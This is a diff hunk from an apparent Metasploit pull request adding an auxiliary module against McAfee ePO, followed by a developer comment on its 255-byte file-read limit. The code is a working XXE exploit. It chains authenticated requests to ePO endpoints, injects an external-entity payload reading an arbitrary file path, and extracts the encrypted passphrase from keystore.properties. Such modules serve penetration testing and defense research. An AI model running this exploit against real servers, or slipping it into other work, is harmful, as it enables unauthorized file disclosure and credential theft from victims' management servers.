modules/auxiliary/gather/mcafee_epo_xxe.rb

```diff
@@ -0,0 +1,261 @@
+      },
+      'cookie' => cookie
+    })
+
+    unless res
+      fail_with(Failure::Unknown, "Server did not respond in an expected way")
+    end
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'core', 'orionTableUpdateState.do'),
+      'method' => 'POST',
+      'vars_post' => {
+        'dataSourceAttr' => 'scheduler.tasklog.datasource.attr',
+        'tableId' => 'taskLogTable',
+        'columnWidths' => '285,285,285,285,285,285,285,285',
+        'sortColumn' => 'OrionTaskLogTask.StartDate',
+        'sortOrder' => '1',
+        'showFilters' => 'true',
+        'currentIndex' => 0,
+        'orion.user.security.token' => auth_token,
+        'ajaxMode' => 'standard'
+      },
+      'cookie' => cookie
+    })
+
+    unless res
+      fail_with(Failure::Unknown, "Server did not respond in an expected way")
+    end
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'core', 'loadDisplayType.do'),
+      'method' => 'POST',
+      'vars_post' => {
+        'displayType' => 'text_lookup',
+        'operator' => 'eq',
+        'propKey' => 'OrionTaskLogTask.Name',
+        'instanceId' => 0,
+        'orion.user.security.token' => auth_token,
+        'ajaxMode' => 'standard'
+      },
+      'cookie' => cookie
+    })
+
+    print_status("Sending payload...")
+
+    xxe = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///'+datastore['FILEPATH']+'" >]><conditions><condition grouping="or"><prop-key>OrionTaskLogTaskMessage.Message</prop-key><op-key>eq</op-key><value>&xxe;</value></condition></conditions>'
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'core', 'orionUpdateTableFilter.do'),
+      'method' => 'POST',
+      'vars_post' => {
+        'orion.user.security.token' => auth_token,
+        'datasourceAttr' => 'scheduler.tasklog.datasource.attr',
+        'tableId' => 'taskLogTable',
+        'conditionXML' => xxe,
+        'secondaryFilter' => '',
+        'op' => 'eq',
+        'ajaxMode' => 'standard'
+      },
+      'cookie' => cookie
+    })
+
+    unless res
+      fail_with(Failure::Unknown, "Server did not respond in an expected way")
+    end
+
+    if res.code == 404
+      fail_with(Failure::Unknown, "Server likely has mitigation in place")
+    end
+    
+    print_status("Getting encrypted passphrase value from keystore.properties file...")
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'core', 'orionEditTableFilter.do'),
+      'vars_get' => {
+        'datasourceAttr' => 'scheduler.tasklog.datasource.attr',
+        'tableId' => 'taskLogTable',
+        'orion.user.security.token' => auth_token
+      },
+      'cookie' => cookie
+    })
+
+    unless res
+      fail_with(Failure::Unknown, "Server did not respond in an expected way")
+    end
+
+    passphrase = $1 if res.body =~ /passphrase=(.*?)\\u003/
```

Comment:
Ah, so there is a limitation on how large the file to be read from the FS can be, and that is 255 bytes. The reason I allow the user to change the file path is because I believe ePO can run on Linux too, so the default path for Windows can be changed to whatever the Linux path would be.

I couldn't find any other useful files that were less than the 255 byte limitation.